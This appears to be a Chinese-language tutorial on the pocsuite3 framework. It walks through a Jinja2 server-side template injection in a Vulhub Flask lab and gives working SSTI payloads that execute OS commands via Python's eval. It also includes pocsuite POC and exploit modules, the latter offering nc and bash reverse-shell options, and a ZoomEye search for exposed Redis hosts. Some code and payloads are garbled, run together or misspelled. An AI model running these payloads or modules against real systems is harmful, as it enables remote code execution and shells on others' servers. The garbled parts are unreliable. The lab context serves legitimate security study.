pocsuite安装

安装pocsuite3

pip3 install pocsuite

安装数据包

pip3 install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple/

requirement.txt内容
requests == 2.22.0
PySocks == 1.7.1
requests-toolbelt == 0.9.1
urllib3 == 1.25.6

在使用pocsuite时，我们可以用–verify参数调用_verify方法，验证目标是否存在漏洞；
用–atack参数时调用_attack方法，用来向目标发起攻击

python pocsuite.py -r pocs/test.py(脚本路径） -u  targe-url --verify
python pocsuite.py -r pocs/test.py(脚本路径） -f 1.txt(目标地址文件） --verify
python pocsuite.py -r pocs/* - u  targe-url --verify	#使用所有poc测试
python pocsuite.py -r pocs/test.py(脚本路径） -u  targe-url --verify --threads 10
python cli.py --dork 'port:6379' --vul-keyword 'redis ' --max-page
#使用zoomeye搜索引擎
python pocsuite.py -r pocs/test.py(脚本路径） - u  targe-url --attack 	#攻击模式
python pocsuite.py -r pocs/test.py(脚本路径） - u  targe-url --shell 	#交互模式
python pocsuite.py -r pocs/test.py(脚本路径） - u  targe-url --attack --command "whomai"

flask简介

Flask是一个使用pyton编写的轻量级Web应用框架，模板引擎则使用Jinja2。Flask属于微框架(micro-framework),这既是优点也是缺点，优点是框架轻量，更新依赖少，更容易专注于安全方面的漏洞，缺点是不得不通过添加插件来增加依赖列表。Flask 依赖中就有造成模板注人漏洞的插件Jinja2的模板引擎，Jinja2 是一个面向Python的模板语言。

环境安装

git clone https://github.com/vulhub/vulhub.git
进入、vulhub/flask/ssit
docker-compose build
docker-compose up -d

2.代码分析

docker ps -a
docker exec -it 1e8500123856 /bin/bash

def index():name = request.args.get('name', 'guest')t = Template("Hello " + name)return t.render()if __name__ == "__main__":app.run()

可以看出name未经过滤就传入了服务器

利用代码及方式

payload:

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.__globals__.values() %}{% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{{ b['eval']('__import__("os").popen("id
").read()') }}{% endif %}{% endif %}{% endfor %}
{% endif %}
{% endfor %}

顺利执行，可以查看文件内容

关于poc的编写

poc验证模块

from collections import OrderedDict
from urllib.parse import urljoin
import re
from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORYclass DemoPOC(POCBase):		#实现类DemoPoc,继承自POCBasevulID = '1.1'		version = '1.1'author = ['1']vulDate = '1.1'createDate = '2020/10/10'updateDate = '1.1'references = ['flask']name = 'flask-poc'appPowerLink = 'flask'appName = 'flask'appVersion = 'flask'vulType = VUL_TYPE.CODE_EXECUTIONdesc = '''flask'''#samples = ['96.234.71.117:80']#category = POC_CATEGORY.EXPLOITS.REMOTEdef _verify(self):		#验证代码函数result = {}			#result返回结果path = "?name="url = self.url + pathpayload = "{{3*3}}"try:res = requests.get(url=url + payload )if res.status_code == 200 and "9" in res.text:result['VerifyInfo'] = {}result['VerifyInfo'] = urlresult['VerifyInfo'] = payloadexcept Exception as e:          #returnreturn self.parse_output(result)def _attack(self):			#注意:若该poc没有攻击模式，在_attack函数下，return self._verigy(),不用再写_attack()return self._verify()def parse_output(self, result):output = Output(self)if result:output.success(result)else:output.fail('target is not culnerable')return output
register_poc(DemoPOC)

执行结果：

exp执行模块
Jinjia2 模板访问Python的内置变量并调用时，需要用到Python参数如下所示。

__obases__:以元组返回一个类所直接继承的类。
__mro__:以元组返回继承关系链。
__class__ : 返回对象所属的类。
__globals__:以dict返回函数所在模块命名空间中的所有变量。
__subclasses_ (): 以列表返回类的子类。
__builtins__ :内建函数。

Python中可以直接运行一些函数，如int()、list() 等，这些函数可以__builtins__中查到。查看的方法是dir(__ builtins__ )。利用Python的特性，渗透测试的思路是利用__builtins__的特性得到eval,如下所示:

for c in () .__class__.__base()__[0].subclass__():if c.__name__ == '_IterationGuard':c.__init__.__globals__['__builtins__']['eval']("___import__('os').system('whoami')")

再将其转为Jinja2语法格式。Jinja2 的语法与Python语法相似，但在每个语句的开始和结束处需要使用{{%%}} 括起来，转化后的代码如下所示:

{%%20for%20c%20in%20[].__class__.__ base__ .__subclass__ () %20%}%20{%' \
' %20if%20c.__name__ ==827_ IterationGuard27%20&}%20{{%20c._ init__.__globals__ [%27builtins__ 827] ，\
'[%27eva1%27]("__import__(%27os%27).popen(%27whoami%&27.read()")%20%%}%20{%20%20end-if%20%}%20{%' \
'%20endfor%20%}

{%%20for %20C%20in%20[] .__ class__ ._ base__ ._ subclass___ () %20%}%20{8
'%20if%20c._ name_ ==&27_ Iterat ionGuard827%20%}%20{{%20c._ init_ ._ globals__[ 各 27

from collections import OrderedDict
from urllib.parse import urljoin
import re
from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORYclass DemoPOC(POCBase):vulID = '1.1'version = '1.1'author = ['1']vulDate = '1.1'createDate = '1.1'updateDate = '1.1'references = ['1.1']name = 'flack-exp'appPowerLink = 'flack'appName = 'flask'appVersion = 'flask'vulType = VUL_TYPE.CODE_EXECUTIONdesc = ''''''#samples = ['96.234.71.117:80']#category = POC_CATEGORY.EXPLOITS.REMOTEdef _options(self):  # 结束command参数并执行o = OrderedDict()payload = {"nc": REVERSE_PAYLOAD.NC,"bash": REVERSE_PAYLOAD.BASH,}o["command"] = OptDict(selected="bash", default=payload)return odef _verify(self):output = Output(self)result = {}def _attack(self):#url:http://192.168.0.103:8000/?name={{2*2}}result = {}path = "?name="url = self.url + pathcmd = self.get_option("command")# payload含义：绕过注册的python逃逸的内置函数payload = 'name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__("os").popen("' + cmd + '").read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D'try:res = requests.get(url=url + payload)t = res.textt = t.replace('\n','').replace('\r','')print(t)t = t.replace(" ","")result['VerifyInfo'] = {}result['VerifyInfo']['URL'] = urlresult['VerifyInfo']['Name'] = payloadexcept Exception as e:returnreturn self.parse_attack(result)def parse_attack(self,result):output = Output(self)if result:output.success(result)else:output.fail('target is not vulnerable')return outputregister_poc(DemoPOC)